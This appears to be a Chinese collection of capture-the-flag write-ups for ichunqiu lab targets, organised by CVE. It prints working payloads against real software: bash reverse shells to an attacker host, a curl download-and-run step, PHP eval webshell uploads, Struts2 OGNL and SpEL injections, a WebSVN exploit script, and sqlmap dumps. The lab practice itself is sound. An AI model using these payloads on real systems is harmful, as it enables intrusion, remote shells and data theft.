春秋云镜 免费空间 漏洞合集(持续更新中)
CVE-2017-17405
靶标介绍:
2.4.3之前的Ruby允许Net :: FTP命令注入。
思路:将反弹命令搞成base64,(如果有+号,要替换成%2B),在VPS上开一个FTP,同时NC监听80端口,最后提交POST包。
0x01 VPS上开FTP,监听80端口
python3 -m pyftpdlib -p 21 -i 0.0.0.0
nc -lvvp 80
0x02 提交POST包
利用成功返回shell
CVE-2018-1000533
标靶介绍
gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞。
思路:提交POST包,将反弹命令(shell.sh)放到vps上的web目录下,下载反弹命令到靶场上,最后执行反弹。
0x01 VPS开web服务,shell.sh放到根目录上
bash -i >& /dev/tcp/IP/PORT 0>&1
python3 -m http.server 80
0x02 执行下载后的命令,
0x03 web服务有Get请求
0x04 执行shell.sh
0x05 nc监听得到shell
CVE-2018-12530
靶标介绍:
Metinfo 6.0.0任意文件删除。后台密码:f2xWcke5KN6pfebu
思路:删除某个cms的文件导致cms可以重新安装
0x01 进后台
在靶场URL后加admin目录进入页面(http://eci-2zeibq1vbfl4on2x6vwg.cloudeci1.ichunqiu.com/admin/),输入账户密码(用户名:admin 密码:f2xWcke5KN6pfebu)进入后台
0x02 发get请求删除文件,网站进入重新安装模式
0x03 进入安装模式,
页面显示数据库失败不用担心
0x03 查看flag
CVE-2017-5941
靶标介绍:
在 Node.js 的 node-serialize 包 0.0.4 中发现了一个问题。传递到 unserialize() 函数的不受信任的数据可以被利用,通过传递带有立即调用函数表达式 (IIFE) 的 JavaScript 对象来实现任意代码执行。
0x01 把play填到密码里
_$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >& /dev/tcp/IP/Port 0>&1"')}()
0x02 提交,服务器nc监听得到shell
CVE-2017-5638
靶标介绍:
3.1.32 之前的 Smarty 3 在未清理模板名称的自定义资源上调用 fetch() 或 display() 函数时容易受到 PHP 代码注入的影响。
0x01 蚁剑直接连接
http://eci-2ze0v2gvarqi7rlzurk4.cloudeci1.ichunqiu.com/index.php?eval=*/@eval($_POST[%27caidao%27]);/*
CVE-2017-5638
靶标介绍:
2.3.32 之前的 Apache Struts 2 2.3.x 和 2.5.10.1 之前的 2.5.x 中的 Jakarta Multipart 解析器在文件上传尝试期间具有不正确的异常处理和错误消息生成,这允许远程攻击者通过精心制作的内容执行任意命令-Type、Content-Disposition 或 Content-Length HTTP 标头,如 2017 年 3 月在野外利用的那样,其 Content-Type 标头包含 #cmd= 字符串。
CVE-2018-1273
靶标介绍:
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
0x01 提交POST包下载反弹命令
POST /users?page=&size=5 HTTP/1.1
Host: eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080
Connection: close
Referer: http://eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080/users/
Upgrade-Insecure-Requests: 1
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://IP/shell.txt -o /tmp/shell.sh")]=admion&password=admin&repeatedPassword=sfasd
0x02 然后再执行
POST /users?page=&size=5 HTTP/1.1
Host: eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 148
Origin: http://eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080
Connection: close
Referer: http://eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080/users/
Upgrade-Insecure-Requests: 1
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/bin/bash /tmp/shell.sh")]=admion&password=admin&repeatedPassword=sfasd
0x03 nc监听
[root@hk5LXA7VR9G6 ~]# nc -lvvp 80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 39.106.20.178.
Ncat: Connection from 39.106.20.178:65156.
root@engine-2:/# cat /flag
cat /flag
flag{3c2ddc33-c8fe-4766-8b7b-734645fa634e}root
CVE-2018-16283
靶标介绍:
WordPress Plugin Wechat Broadcast LFI
CVE-2018-7422
靶标介绍:
WordPress Plugin Site Editor LFI
CVE-2022-30887
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
0x01 找后台密码(我也是看别人的。。。。)
用账户(用户名:mayuri.infospace@gmail.com 密码:mayurik)登录。有的文章说是去官网链接下载源码,sql数据库里默认的账户密码。
0x02 随便找个上传,直接传
0x03 连接webshell
后面发现,并不需要账户密码,只需要写好exp,直接send也能getshell。用下面这个也可以传上去。。。他妈的
POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: eci-2ze4l4xnsjb7pl6du5ur.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------204377828939145669082912249480
Content-Length: 484
Origin: http://eci-2ze4l4xnsjb7pl6du5ur.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze4l4xnsjb7pl6du5ur.cloudeci1.ichunqiu.com/editproduct.php?id=1
Cookie: PHPSESSID=tt0rrdc67e71ge23kavh1c6jtq
Upgrade-Insecure-Requests: 1
-----------------------------204377828939145669082912249480
Content-Disposition: form-data; name="old_image"
tab.jpg
-----------------------------204377828939145669082912249480
Content-Disposition: form-data; name="productImage"; filename="sql1112.php"
Content-Type:
<?php @eval($_POST['shell']);?>
-----------------------------204377828939145669082912249480
Content-Disposition: form-data; name="btn"
-----------------------------204377828939145669082912249480--
CVE-2020-17530
靶标介绍:
对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。当对标签属性中的原始用户输入进行评估时,强制 OGNL 评估可能会导致远程代码执行。 POST name:)
0x01 POC 直接上
POST /index.action HTTP/1.1
Host: eci-2ze93woxli32dqyfqxdt.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 836
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="name"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("cat /flag")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
CVE-2018-20604
靶标介绍:
雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发,适合各类视频、影视网站的影视内容管理程序,该CMS存在缺陷,可以通过 admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt 的方式读取任意文件。
CVE-2019-9042
靶标介绍:
Sitemagic CMS v4.4 index.php?SMExt=SMFiles 存在任意文件上传漏洞,攻击者可上传恶意代码执行系统命令
0x01 用admin admin登录,然后找上传直接传webshell,包都不用抓。
0x02 找路径 http://eci-2ze9xeoe2ld28dfmkn22.cloudeci1.ichunqiu.com/files/images/1.php,然后菜刀连接
CVE-2022-23906
靶标介绍:
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
0x01 用Admin 123456登录,然后访问editusertag.php
0x02 在编辑界面写入playload
0x03 拿到flag
CVE-2022-0848
靶标介绍:
part-db RCE
0x01 进入网页先连接
0x02 找poc 发送包
0x03 菜刀连接http://url.com/data/media/labels/POC.pht 获取flag
CVE-2022-23316
靶标介绍:
taoCMS v3.0.2 存在任意文件读取漏洞
0x01 进入后台http://url/admin/ 查一查默认密码是admin tao,登录
0X02 直接拿flag
CVE-2020-25540
靶标介绍:
ThinkAdmin 6版本存在路径遍历漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件.
0x01 使用php构造../../../flag
<?php
function encode($content)
{
list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
return $chars;
}
$content="../../../flag";
echo encode($content);
?>
访问网页
0x02 放到url访问网站
0x03 吧data拿去base64解密,提交
CVE-2021-34257
靶标介绍:
WPanel是一个用于构建博客、网站和网络应用程序的CMS。 WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传。
0x01 http://url/index/admin/login访问后台,使用admin@admin.com admin登录
0x02 找到有漏洞上传的页面,http://url/index.php/admin/galleries
0x03 上传php文件
POST /index.php/admin/galleries/add HTTP/1.1
Host: eci-2ze1p8ih20ad2stghnkd.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------5691217863167846249375518708
Content-Length: 861
Origin: http://eci-2ze1p8ih20ad2stghnkd.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze1p8ih20ad2stghnkd.cloudeci1.ichunqiu.com/index.php/admin/galleries/add
Cookie: wpanel_csrf_cookie=88500a11e96b647c80f93a8b627674f1; wpanel_=o32uireutu4ot3fd5rbphr4u5dclp3ca; Profiler=closed
Upgrade-Insecure-Requests: 1
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="wpanel_csrf_token"
88500a11e96b647c80f93a8b627674f1
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="titulo"
123123
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="descricao"
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="tags"
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: application/x-php
<?php @eval($_POST['shell']);?>
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="status"
0
-----------------------------5691217863167846249375518708--
forward后继续forward发现了shell地址
0x04 菜刀连接,拿flag
CVE-2020-26042
靶标介绍:
Hoosk CMS v1.8.0 install/index.php 存在sql注入漏洞
详情:https://github.com/kr0za/bugs/blob/master/hoosk.md#0x02-install-sqli
0x01 进入界面,抓包发包(数据库填mysql,用户名root,密码root)
0x02 一句话写到cms的config.php 里
0x03 菜刀连接,获取flag
CVE-2020-21650
靶标介绍:
MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展 其2.2版本中admin.php/config/add方法存在任意命令执行漏洞.
思路:后台RCE???胡扯,搞了好一整,又是抓包又是查资料。狗屁不是。
0x01 http://url/index.php/bbs/index/download?url=../../flag&local=1&name
CVE-2021-32305
靶标介绍:
WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。
0x01 使用poc反弹shell到vps,vps查看
import requests
import argparse
from urllib.parse import quote_plus
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/VPS/PORT 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.target.startswith("https://"):
target = args.target
else:
print("[!] Target should start with either http:// or https://")
exit()
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
print("[*] Request send. Did you get what you wanted?")
CVE-2022-25401
靶标介绍:
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞
https://github.com/CuppaCMS/CuppaCMS/issues/32
CVE-2022-22909
靶标介绍:
Hotel Druid RCE
https://www.exploit-db.com/exploits/50754
0x01 找到poc,执行
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 50754.py -t http://eci-2ze02h0t37n6dmflz1m1.cloudeci1.ichunqiu.com --noauth
/$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$
| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$
| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$
| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$
| $$__ $$| $$ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ __/| $$ | $$| $$| $$ | $$
| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$
| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$
|__/ |__/ ______/ ___/ _______/|__/ |_______/ |__/ ______/ |__/ _______/
Exploit By - 0z09e (https://twitter.com/0z09e)
[*] Trying to access the Dashboard.
[*] Checking the privilege of the user.
[+] User has the privilege to add room.
[*] Adding a new room.
[+] Room has been added successfully.
[*] Testing code exection
[+] Code executed successfully, Go to http://eci-2ze02h0t37n6dmflz1m1.cloudeci1.ichunqiu.com/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.
[+] Example : http://eci-2ze02h0t37n6dmflz1m1.cloudeci1.ichunqiu.com/dati/selectappartamenti.php?cmd=id
[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)
0x02 看见返回成功了,在上面执行的时候可以截包,发现可以下面这样搞
CVE-2022-24223
靶标介绍:
AtomCMS SQL注入漏洞
0x01 抓登录包,sqlmap跑起来
atomcms-sql.txt
POST /admin/login.php HTTP/1.1
Host: eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com/admin/login.php
Cookie: PHPSESSID=ptd7gqki27skss75psisrfpdo6
Upgrade-Insecure-Requests: 1
email=asdfsda%40asdf.com&password=asdf
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r atomcms-sql.txt --dbms=mysql --technique=T --time-sec 2 -D atomcms -T flag --dump
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:33:15 /2023-06-12/
[09:33:15] [INFO] parsing HTTP request from 'atomcms-sql.txt'
[09:33:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=asdfsda@asdf.com' AND (SELECT 8192 FROM (SELECT(SLEEP(2)))ekYg) AND 'AUxb'='AUxb&password=asdf
---
[09:33:16] [INFO] testing MySQL
[09:33:16] [INFO] confirming MySQL
[09:33:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[09:33:16] [INFO] fetching columns for table 'flag' in database 'atomcms'
[09:33:16] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[09:33:19] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[09:33:22] [INFO] retrieved: flag
[09:33:49] [INFO] fetching entries for table 'flag' in database 'atomcms'
[09:33:49] [INFO] fetching number of entries for table 'flag' in database 'atomcms'
[09:33:49] [INFO] retrieved: 1
[09:33:52] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{9fb6a888-fdf4-4a1a-b8cf-1a8c8904462a}
Database: atomcms
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{9fb6a888-fdf4-4a1a-b8cf-1a8c8904462a} |
+--------------------------------------------+
[09:39:52] [INFO] table 'atomcms.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com/dump/atomcms/flag.csv'
[09:39:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com'
[*] ending @ 09:39:52 /2023-06-12/
CVE-2022-28512
靶标介绍:
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
0x01 sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://eci-2ze18bhk12virk77uea8.cloudeci1.ichunqiu.com/single.php?id=4 -D ctf -T flag --dump
___
__H__
___ ___[)]_____ ___ ___ {1.7.2#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:51:26 /2023-06-12/
[09:51:26] [INFO] resuming back-end DBMS 'mysql'
[09:51:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=4' AND 6714=6714 AND 'AJSM'='AJSM
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=4' AND (SELECT 4457 FROM(SELECT COUNT(*),CONCAT(0x7171707071,(SELECT (ELT(4457=4457,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'GOBV'='GOBV
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=4' AND (SELECT 5382 FROM (SELECT(SLEEP(5)))nRKA) AND 'cTMS'='cTMS
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=-7760' UNION ALL SELECT NULL,CONCAT(0x7171707071,0x4775647544786d466956776658634c4e75504d6c4c457875515566774e67694671594c7465515172,0x716a706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[09:51:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:51:26] [INFO] fetching columns for table 'flag' in database 'ctf'
[09:51:26] [INFO] fetching entries for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{2667c364-99ad-45fc-94d8-677932c5d39b} |
+--------------------------------------------+
[09:51:27] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze18bhk12virk77uea8.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[09:51:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze18bhk12virk77uea8.cloudeci1.ichunqiu.com'
[*] ending @ 09:51:27 /2023-06-12/
CVE-2022-28060
靶标介绍:
Victor CMS v1.0 /includes/login.php 存在sql注入
0x01 抓登录包,sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r victor-sql.txt --dbms mysql --technique=T --thread 1 --time-sec 2 --file-read /flag
___
__H__
___ ___["]_____ ___ ___ {1.7.2#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:21:59 /2023-06-12/
[10:21:59] [INFO] parsing HTTP request from 'victor-sql.txt'
[10:21:59] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:21:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_name=123' AND (SELECT 5189 FROM (SELECT(SLEEP(2)))DLQA) AND 'hNLb'='hNLb&user_password=123&login=
---
[10:21:59] [INFO] testing MySQL
[10:21:59] [INFO] confirming MySQL
[10:21:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[10:21:59] [INFO] fingerprinting the back-end DBMS operating system
[10:22:03] [INFO] the back-end DBMS operating system is Linux
[10:22:03] [INFO] fetching file: '/flag'
[10:22:03] [INFO] retrieved:
[10:22:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
666C61677B37616636613933302D333731332D343833622D396230662D6132353430366238343864667D
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[10:35:42] [INFO] retrieved:
[10:35:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
42
[10:35:55] [INFO] the local file '/home/kali/.local/share/sqlmap/output/eci-2ze7fshs6k2i8j96pyqi.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/eci-2ze7fshs6k2i8j96pyqi.cloudeci1.ichunqiu.com/files/_flag (same file)
[10:35:55] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze7fshs6k2i8j96pyqi.cloudeci1.ichunqiu.com'
[*] ending @ 10:35:55 /2023-06-12/
0x02 把666C61677B37616636613933302D333731332D343833622D396230662D6132353430366238343864667D放到16进制编辑器里
CVE-2022-24263
靶标介绍:
Hospital Management System sqli
0x01 抓登录包,sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r hms-sql.txt --dbms mysql -p username1 --technique=B -theard 10 -D ctf -T flag --dump
___
__H__
___ ___[']_____ ___ ___ {1.7.2#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:52:59 /2023-06-12/
[10:52:59] [INFO] parsing HTTP request from 'hms-sql.txt'
[10:52:59] [INFO] setting file for logging HTTP traffic
[10:52:59] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jd7438qd5b0...5eatb2cqfg'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username1 (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username1=admina' OR NOT 9558=9558#&password2=admin&adsub=Login
---
[10:53:01] [INFO] testing MySQL
[10:53:01] [INFO] confirming MySQL
[10:53:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.3.20
back-end DBMS: MySQL >= 8.0.0 (MariaDB fork)
[10:53:01] [INFO] fetching columns for table 'flag' in database 'ctf'
[10:53:01] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:53:01] [INFO] retrieved:
got a 302 redirect to 'http://eci-2ze7pvgkweq2v9ejuqus.cloudeci1.ichunqiu.com:80/admin-panel1.php'. Do you want to follow? [Y/n] n
1
[10:53:03] [INFO] retrieved: flag
[10:53:06] [INFO] fetching entries for table 'flag' in database 'ctf'
[10:53:06] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[10:53:06] [INFO] retrieved: 1
[10:53:07] [INFO] retrieved: flag{034f23c4-de5c-45de-bf88-dd2c9baa9d9a}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{034f23c4-de5c-45de-bf88-dd2c9baa9d9a} |
+--------------------------------------------+
[10:53:38] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze7pvgkweq2v9ejuqus.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[10:53:38] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze7pvgkweq2v9ejuqus.cloudeci1.ichunqiu.com'
[*] ending @ 10:53:38 /2023-06-12/
CVE-2022-25488
靶标介绍:
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
0x01 google查询一下,sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://eci-2ze7fshs6k2i9cunesl6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --technique=B --dbms mysql --os-shell
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:06:41 /2023-06-12/
[11:06:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4326=4326
---
[11:06:41] [INFO] testing MySQL
[11:06:41] [INFO] confirming MySQL
[11:06:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:06:41] [INFO] going to use a web backdoor for command prompt
[11:06:41] [INFO] fingerprinting the back-end DBMS operating system
[11:06:41] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
[11:06:44] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[11:06:46] [WARNING] unable to automatically parse any web server path
[11:06:46] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[11:06:46] [WARNING] unable to upload the file stager on '/var/www/'
[11:06:46] [INFO] trying to upload the file stager on '/var/www/admin/ajax/' via LIMIT 'LINES TERMINATED BY' method
[11:06:47] [WARNING] unable to upload the file stager on '/var/www/admin/ajax/'
[11:06:47] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[11:06:47] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://eci-2ze7fshs6k2i9cunesl6.cloudeci1.ichunqiu.com:80/tmpusdwp.php
